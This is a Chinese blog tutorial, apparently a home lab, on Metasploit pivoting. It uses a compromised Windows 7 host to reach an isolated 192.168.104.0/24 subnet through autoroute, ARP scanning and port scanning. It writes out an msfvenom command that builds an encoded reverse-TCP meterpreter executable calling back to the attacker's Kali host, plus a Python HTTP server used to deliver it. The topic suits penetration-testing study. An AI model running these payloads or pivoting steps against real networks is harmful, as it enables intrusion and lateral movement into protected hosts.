Pivoting跳板攻击与自动路由

最新推荐文章于 2024-04-15 00:46:40 发布
最新推荐文章于 2024-04-15 00:46:40 发布
阅读量803 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: 内网渗透 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/115047231
版权

网络拓扑图及通信原理

我们现在假若得到了192.168.103.101的主机权限,但是我们经过收集信息发现只有该win7主机是出网的,里面还有一个网段的主机不出网,那么这时我们就要使用跳板攻击的方式访问到不出网的主机。这里我们假设出网的网段为192.168.103.0/24,不出网的数据库主机所处网段为192.168.104.0/24,我们在vmware上分别设置好这两个网段。
在这里插入图片描述
vmnet2之前上一章已经配置完成,vmnet3设置DHCP配置
在这里插入图片描述
以下分别是win7windows server2003的网络配置
在这里插入图片描述

在这里插入图片描述

攻击过程

现在我们在kali上生成一个木马文件,然后使用win7下载到本机上,使用管理员的权限运行该文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.101.63(这是kali的NAT映射到外网的IP) lport=4444 -b "\x00\xff" -a x86 --platform windows -e x86/shikata_ga_nai -f exe > msf.exe

在这里插入图片描述
然后在kali上开启一个HTTP服务,使用win7下载到本机上

python -m SimpleHTTPServer 4444

在这里插入图片描述
kali上使用windows/meterpreter/reverse_tcp这个漏洞利用模块,其他操作不再赘述
在这里插入图片描述
进一步提权
在这里插入图片描述
然后我们在meterpreter上使用ipconfig这个命令时,发现了两个网段的IP地址,初步判断有可能是内网敏感数据所处的IP网段
在这里插入图片描述
在这里插入图片描述
不说废话,立马开干!首先使用post/windows/gather/arp_scanner模块对内网信息进行收集
在这里插入图片描述
然后使用自动路由的方式,将192.168.104.0/24这个网段添加到路由表中
在这里插入图片描述
然后将会话拉入后台中,接着我们使用auxiliary/scanner/portscan/tcp这个模块扫描主机开放了哪些端口和服务。这里我们就选了几个常用的端口
在这里插入图片描述
收集完成!
在这里插入图片描述

平凡的学者
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
vulnhub Bob: 1.0.1
箭雨镜屋
04-27 1542
渗透思路:nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权
oracle public ip,Oracle11g RAC环境下public ip vip priv-ip的修改方法
weixin_34380892的博客
04-03 568
Oracle11g RAC环境下public IP、VIP、scan-IP、private IP的修改方法一、修改方法1.环境操作系统版本:AIX 6.1Oracle版本:11.2.0.3修改前IP配置:192.168.101.61 host1192.168.101.62 host210.10.11.61 host1-priv10.10.11.62 host2-priv192.168.101.63...
网络基础三层-ipv4
网络重启工程师的博客
06-15 636
ip层 报文 Type of Service:服务类型,网络层Qos。 Total Length:ip数据的字节数。 Identification标识,Flags,Fragment Offset:整层用于数据包的分片和重组。 TTL:Time to Live,数据每经过一次三层转发,TTL值-1,当TTL=0时数据包会被丢弃,(总长度,8bit,<0~2...
渗透测试跳板攻击流程及示例代码
程序员三九的博客
01-03 1000
渗透测试中的跳板攻击是一种高级的技术,用于在目标网络或系统内深入渗透。它涉及利用一个或多个已被攻破的系统作为“跳板”,从而进一步攻击其他系统或网络资源。这种方法可以帮助绕过网络隔离或安全控制,扩大攻击者的影响范围。
内网攻击跳板机为Linux
kiihuang的博客
04-12 211
攻击机 Kali 192.168.114.62 跳板机 Linux 192.168.114.84 10.10.10.200 TYPE=Ethernet PROXY_METHOD=none BROWSER_ONLY=no BOOTPROTO=static DEFROUTE=yes IPV4_FAILURE_FATAL=no IPV6INIT=yes IPV6_AUTOCONF=yes IPV6_DEFROUTE=yes IPV6_FAILURE_FATAL=no IPV6_ADDR_GEN_MODE=s
源代码_自动控制原理_
10-01
自动控制原理是工程领域中至关重要的一个学科,它涉及到信号处理、系统分析与设计等多个方面。MATLAB作为强大的数学计算软件,是进行自动控制理论研究和实践应用的重要工具。在本资源中,我们通过MATLAB的APP ...
Column Pivoting Gauss Elimination Method: Column Pivoting Gauss Elimination Method-matlab开发
05-30
在数值敏感的场景下,可能需要结合其他方法,如部分 pivoting 或者 complete pivoting。 3. 效率考虑:虽然自定义的列旋转高斯消元法可能比MATLAB内置函数慢,但在特定情况下,如矩阵结构特殊或需要控制稳定性时,它...
Gpp.zip_Elimination_gaussian scaled_gpp_partial pivoting_高斯消元法
09-20
通过运行这段代码,我们可以解决线性方程组问题,并观察到与未使用部分高斯消元法相比,计算结果的稳定性是如何提升的。 总结来说,部分高斯消元法(Gaussian elimination with scaled partial pivoting)是解决...
一种改进Ball Pivoting的散乱点云数据重建算法
03-11
一种改进Ball Pivoting的散乱点云数据重建算法
Gauss-Jordan Elimination with Partial Pivoting:Gauss-Jordan Elimination with Partial Pivoting-matlab开发
06-01
该文件包含一个名为“elimgauss03”的函数,该函数使用部分旋转的高斯-乔丹消元法计算矩阵的缩减行梯形形式。 为了尽量减少所需的计算次数,该算法不会计算一些不必要的计算。 例如,给定矩阵一 = 16 2 3 13 5 11 ...
跳板攻击原理
03-03
跳板攻击是黑客常用的攻击方式,如果有兴趣下来自己留着,有用的
跳板攻击入侵技术实例解析.php
12-15
跳板攻击入侵技术实例解析 .php
多层跳板攻击
weixin_45007073的博客
03-27 1869
前言 首先,我们在上一章的基础上,即在Windows Server2003的主机上又发现了另一层的网络,所以我们就必须在以win2003为跳板机,再去访问下一个网段的主机,即多层跳板攻击攻击过程 我们这里使用一台Linux主机为另一个服务器,并设置一个新的网段来进行隔离,原理和上一章的差不多 查看win2003时发现新的网段 然后我们使用arp_scan模块扫描出更多的主机 更新路由表并打印出来 然后我们再新开一个socks4a代理,并使用jobs命令查看任务,因为之前使用了1080这个端口
Pivoting跳板攻击
imtech的博客
01-09 580
MSF 跳板攻击 Pivoting
内网渗透系列-Pivoting跳板攻击自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
最新发布
lza20001103的博客
04-15 880
内网渗透系列-Pivoting跳板攻击自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
内网渗透系列之Pivoting跳板攻击自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
lza20001103的博客
09-04 2125
Pivoting跳板攻击自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限 文章目录Pivoting跳板攻击自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限前言msf反弹shell配置路由存活主机探测端口扫描后记 前言 相信大家在内网渗透过程中都会遇到,进入内网后,无法访问内网页面的情况,这是我们就需要配置路由信息,访问内网页面,然后设置socks4代理进行扫描端口的信息,进而利用相关端口,利用相关的漏洞信息,进行漏洞利用,获取靶机的权限。这就是内网
网络安全>《52 网络攻防专业课<第十五课 - 跳板
Else 的博客
02-26 1915
攻击者入侵被攻击者时,被攻击者可以根据IP地址追踪攻击者来自哪里。攻击者为了隐藏自己的真正IP,通常会采用跳板,如右图, 攻击者通过2个跳板攻击攻击者。即使被攻击者进行反向追踪,也只能追踪到攻击来自跳板2。如果需要进一步追踪,就需要在跳板2上追踪,而在跳板2上也只能追 踪攻击是来自跳板1。如果被攻击者、跳板1、跳板2分布在不同的国家,将使得追踪攻击者成为一个政治问题。
iptables/nftables/socat/Linux EasyConnect
nia305的博客
02-01 535
文章目录iptablesnftablessocat iptables netfilter-HOWTO这篇文章很好地说明了到底何时该DNAT,何时该SNAT,大致是: SNAT 需要在nat表的POSTROUTING链里面做,DNAT需要在nat表的PREROUTING链里面做。文章里面有具体的例子。最好结合上面的图来看更加清晰。‘ sudo iptables -t nat -A PREROUTING --protocol tcp --dport 8000 -j DNAT --to-destinatio
跳板攻击
weixin_34343308的博客
11-21 1274
原文地址如下:http://www.offensive-security.com/metasploit-unleashed/Pivoting 跳板攻击是一种非常独特的渗透测试技巧-能够使我们入侵到我们无法到达的内部网络。我们使用第一台被入侵的主机作为跳板入侵到内网主机。在这个入侵实例中我们将入侵到一个路由不向我们开放的内部网络。 假设我们是某公司的渗透...
Gauss Elimination through pivoting的优点缺点
04-20
Gauss消元法通过枢轴元的选取来消元,其优点是可以有效避免舍入误差的积累,从而提高计算精度;缺点是在选取枢轴元时需要进行比较和交换,计算复杂度较高,并且该方法只能用于求线性方程组的解,不能用于其他数值...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值